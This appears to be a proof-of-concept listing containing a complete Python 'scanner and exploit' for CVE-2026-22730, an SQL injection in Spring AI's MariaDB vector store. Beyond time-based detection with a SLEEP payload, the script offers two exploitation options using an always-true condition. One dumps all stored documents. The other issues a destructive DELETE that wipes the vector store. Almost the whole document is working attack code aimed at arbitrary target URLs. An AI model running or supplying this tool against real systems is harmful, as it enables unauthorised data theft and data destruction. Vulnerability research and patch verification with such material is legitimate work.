5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve-2026-22730_scanner.py PY
#!/usr/bin/env python3

print("""

███╗░░██╗██╗░░░██╗██╗░░░░░██╗░░░░░██████╗░░█████╗░░█████╗░  ░█████╗░██╗░░██╗
████╗░██║██║░░░██║██║░░░░░██║░░░░░╚════██╗██╔══██╗██╔══██╗  ██╔══██╗██║░██╔╝
██╔██╗██║██║░░░██║██║░░░░░██║░░░░░░░███╔═╝██║░░██║██║░░██║  ██║░░██║█████═╝░
██║╚████║██║░░░██║██║░░░░░██║░░░░░██╔══╝░░██║░░██║██║░░██║  ██║░░██║██╔═██╗░
██║░╚███║╚██████╔╝███████╗███████╗███████╗╚█████╔╝╚█████╔╝  ╚█████╔╝██║░╚██╗
╚═╝░░╚══╝░╚═════╝░╚══════╝╚══════╝╚══════╝░╚════╝░░╚════╝░  ░╚════╝░╚═╝░░╚═╝
            CVE-2026-22730 Scanner & Exploit
  SQL Injection in Spring AI's MariaDB Vector Store
  Supports GET (query parameter) and POST (JSON body) with placeholder.
            NULL200OK 💀🔥created by NABEEL 🔥💀


""")

import requests
import time
import json
import sys
import argparse
from datetime import datetime
from urllib.parse import urlencode, quote_plus

# ---------------------------
#  Configuration
# ---------------------------
DEFAULT_SLEEP = 5        # seconds for time-based detection
TIMEOUT = 10             # HTTP request timeout
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Marker for payload replacement in POST JSON
PAYLOAD_MARKER = "__PAYLOAD__"

# ---------------------------
#  Helper Functions
# ---------------------------
def send_request(base_url, method, param_name, value, json_template=None):
    """
    Send an HTTP request with the injected value.
    Supports GET (query parameter) and POST (JSON body with placeholder).
    Returns (response, elapsed_time).
    """
    headers = {"User-Agent": USER_AGENT}
    method = method.upper()

    if method == "GET":
        params = {param_name: value}
        url = base_url + "?" + urlencode(params, quote_via=quote_plus)
        try:
            start = time.time()
            resp = requests.get(url, headers=headers, timeout=TIMEOUT)
            elapsed = time.time() - start
            return resp, elapsed
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
            return None, 0

    elif method == "POST":
        if not json_template:
            print("[!] POST method requires --json-template with placeholder.")
            return None, 0
        # Replace marker with actual value
        body_str = json_template.replace(PAYLOAD_MARKER, value)
        try:
            body = json.loads(body_str)
        except json.JSONDecodeError:
            print("[!] Invalid JSON template.")
            return None, 0
        headers["Content-Type"] = "application/json"
        try:
            start = time.time()
            resp = requests.post(base_url, json=body, headers=headers, timeout=TIMEOUT)
            elapsed = time.time() - start
            return resp, elapsed
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
            return None, 0

    elif method == "DELETE":
        # For DELETE, we can either send query param or JSON body.
        # We'll support query parameter (as in original advisory) and JSON body if template provided.
        if json_template:
            # DELETE with JSON body (some APIs accept it)
            body_str = json_template.replace(PAYLOAD_MARKER, value)
            try:
                body = json.loads(body_str)
            except json.JSONDecodeError:
                print("[!] Invalid JSON template.")
                return None, 0
            headers["Content-Type"] = "application/json"
            try:
                start = time.time()
                resp = requests.delete(base_url, json=body, headers=headers, timeout=TIMEOUT)
                elapsed = time.time() - start
                return resp, elapsed
            except requests.exceptions.RequestException as e:
                print(f"[!] Request failed: {e}")
                return None, 0
        else:
            # DELETE with query parameter
            params = {param_name: value}
            url = base_url + "?" + urlencode(params, quote_via=quote_plus)
            try:
                start = time.time()
                resp = requests.delete(url, headers=headers, timeout=TIMEOUT)
                elapsed = time.time() - start
                return resp, elapsed
            except requests.exceptions.RequestException as e:
                print(f"[!] Request failed: {e}")
                return None, 0

    else:
        print(f"[!] Unsupported method: {method}")
        return None, 0

def detect_vulnerability(url, method, param, sleep_time, baseline_value="nonexistent", json_template=None):
    """
    Time‑based detection: compare normal request vs. SLEEP payload.
    Returns True if vulnerable, False otherwise.
    """
    print("[*] Sending baseline request...")
    resp1, time1 = send_request(url, method, param, baseline_value, json_template)
    if resp1 is None:
        print("[!] Baseline request failed. Exiting.")
        return False

    # SQLi payload that tries to inject a SLEEP
    payload = f"' OR SLEEP({sleep_time}) --"
    print(f"[*] Sending time‑based payload: {payload}")
    resp2, time2 = send_request(url, method, param, payload, json_template)
    if resp2 is None:
        print("[!] Payload request failed. Exiting.")
        return False

    print(f"[*] Baseline time: {time1:.2f}s, Payload time: {time2:.2f}s")
    # If payload took at least sleep_time seconds longer, consider vulnerable
    if time2 - time1 >= sleep_time - 1:   # allow 1s network jitter
        print("[+] Target appears VULNERABLE to SQL injection!")
        return True
    else:
        print("[-] Target does NOT seem vulnerable.")
        return False

def exploit_retrieve_all(url, method, param, json_template=None):
    """
    Send payload that retrieves all rows (by making WHERE clause always true).
    Returns the response text.
    """
    payload = "' OR '1'='1"
    print(f"[*] Exploiting with payload (retrieve all): {payload}")
    resp, _ = send_request(url, method, param, payload, json_template)
    if resp:
        return resp.text
    else:
        return ""

def exploit_delete_all(url, method, param, json_template=None):
    """
    Send payload that deletes all rows.
    Returns the response text (if any).
    """
    payload = "' OR '1'='1"
    print(f"[*] Exploiting with payload (DELETE all): {payload}")
    # Use DELETE method
    resp, _ = send_request(url, "DELETE", param, payload, json_template)
    if resp:
        return resp.text
    else:
        return ""

def save_results(data, target_url, method, vuln_status, exploit_data=None, exploit_type=None):
    """
    Save results in HTML, JSON, and TXT files.
    """
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    base_filename = f"cve-2026-22730_{timestamp}"

    # Prepare data structure
    report = {
        "timestamp": timestamp,
        "target": target_url,
        "method": method,
        "vulnerable": vuln_status,
        "detection_method": "time-based SQL injection",
        "exploit_type": exploit_type,
        "exploit_result": exploit_data if exploit_data else None
    }

    # JSON
    with open(f"{base_filename}.json", "w") as f:
        json.dump(report, f, indent=4)
    print(f"[+] JSON report saved: {base_filename}.json")

    # TXT
    with open(f"{base_filename}.txt", "w") as f:
        f.write(f"CVE-2026-22730 Scan Report\n")
        f.write(f"Timestamp: {timestamp}\n")
        f.write(f"Target: {target_url}\n")
        f.write(f"Method: {method}\n")
        f.write(f"Vulnerable: {vuln_status}\n")
        if exploit_type:
            f.write(f"Exploit performed: {exploit_type}\n")
        if exploit_data:
            f.write("\n--- Exploitation Result ---\n")
            f.write(exploit_data)
    print(f"[+] TXT report saved: {base_filename}.txt")

    # HTML
    html_content = f"""<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-22730 Scan Report</title>
    <style>
        body {{ font-family: Arial, sans-serif; margin: 40px; }}
        h1 {{ color: #333; }}
        .vuln-yes {{ color: red; font-weight: bold; }}
        .vuln-no {{ color: green; }}
        pre {{ background: #f4f4f4; padding: 10px; border: 1px solid #ddd; }}
    </style>
</head>
<body>
    <h1>CVE-2026-22730 SQL Injection Scanner</h1>
    <p><strong>Timestamp:</strong> {timestamp}</p>
    <p><strong>Target URL:</strong> {target_url}</p>
    <p><strong>HTTP Method:</strong> {method}</p>
    <p><strong>Vulnerable:</strong> <span class="vuln-{'yes' if vuln_status else 'no'}">{vuln_status}</span></p>
    <h2>Exploitation</h2>
    <p><strong>Type:</strong> {exploit_type if exploit_type else "None"}</p>
    <pre>{exploit_data if exploit_data else "No exploitation performed."}</pre>
</body>
</html>"""
    with open(f"{base_filename}.html", "w") as f:
        f.write(html_content)
    print(f"[+] HTML report saved: {base_filename}.html")

# ---------------------------
#  Main
# ---------------------------
def main():
    parser = argparse.ArgumentParser(description="CVE-2026-22730 Scanner")
    parser.add_argument("--url", help="Base URL (e.g., http://localhost:8081/api/docs)")
    parser.add_argument("--method", default="GET", choices=["GET", "POST"], help="HTTP method (default: GET)")
    parser.add_argument("--param", help="Query parameter name (for GET) or marker name (for POST, optional)")
    parser.add_argument("--json-template", help="JSON template with __PAYLOAD__ placeholder (required for POST)")
    parser.add_argument("--baseline", default="nonexistent", help="Baseline value for normal request (default: nonexistent)")
    parser.add_argument("--sleep", type=int, default=DEFAULT_SLEEP, help=f"Sleep seconds for time-based detection (default: {DEFAULT_SLEEP})")
    args = parser.parse_args()

    # Interactive mode if arguments missing
    if not args.url:
        print("=== CVE-2026-22730 Scanner ===\n")
        args.url = input("Enter target URL: ").strip()
        args.method = input("HTTP method (GET/POST) [GET]: ").strip().upper() or "GET"
        if args.method not in ["GET", "POST"]:
            print("[!] Invalid method. Using GET.")
            args.method = "GET"

        if args.method == "GET":
            args.param = input("Enter query parameter name (e.g., department): ").strip()
        else:  # POST
            args.param = input("Enter a name for the injected field (optional, for reference): ").strip() or "payload"
            args.json_template = input("Enter JSON template with __PAYLOAD__ placeholder: ").strip()
            if PAYLOAD_MARKER not in args.json_template:
                print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'. Exiting.")
                sys.exit(1)

        baseline_input = input("Enter a benign value for baseline (default: nonexistent): ").strip()
        if baseline_input:
            args.baseline = baseline_input
        sleep_input = input(f"Enter sleep time for detection (default {DEFAULT_SLEEP}): ").strip()
        if sleep_input:
            try:
                args.sleep = int(sleep_input)
            except ValueError:
                print("[!] Invalid number. Using default.")
    else:
        # Validate arguments
        if args.method == "POST" and not args.json_template:
            print("[!] POST method requires --json-template with __PAYLOAD__ placeholder.")
            sys.exit(1)
        if args.method == "POST" and PAYLOAD_MARKER not in args.json_template:
            print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'.")
            sys.exit(1)
        if args.method == "GET" and not args.param:
            print("[!] GET method requires --param.")
            sys.exit(1)

    # Remove trailing slash if present
    args.url = args.url.rstrip("/")

    print(f"\n[*] Targeting: {args.url} with method {args.method}")

    # Step 1: Detection
    vuln = detect_vulnerability(args.url, args.method, args.param, args.sleep, args.baseline, args.json_template)

    exploit_data = None
    exploit_type = None
    if vuln:
        print("\n[?] Target is vulnerable. Choose exploitation option:")
        print("    1. Retrieve all documents (SELECT injection)")
        print("    2. Delete all documents (DELETE injection) - DESTRUCTIVE")
        print("    3. Skip exploitation")
        choice = input("Enter 1, 2, or 3: ").strip()
        if choice == '1':
            exploit_type = "RETRIEVE_ALL"
            exploit_data = exploit_retrieve_all(args.url, args.method, args.param, args.json_template)
            if exploit_data:
                print("[+] Data retrieval completed.")
            else:
                print("[!] Exploit failed or returned no data.")
        elif choice == '2':
            print("\n[!] WARNING: This will DELETE ALL documents from the vector store!")
            confirm = input("Type 'yes' to confirm: ").strip().lower()
            if confirm == 'yes':
                exploit_type = "DELETE_ALL"
                exploit_data = exploit_delete_all(args.url, args.method, args.param, args.json_template)
                if exploit_data:
                    print("[+] Delete request sent. Check response.")
                else:
                    print("[!] Delete exploit failed.")
            else:
                print("[*] Deletion cancelled.")
        else:
            print("[*] Skipping exploitation.")

    # Step 3: Save results
    save_results(exploit_data, args.url, args.method, vuln, exploit_data, exploit_type)

if __name__ == "__main__":
    main()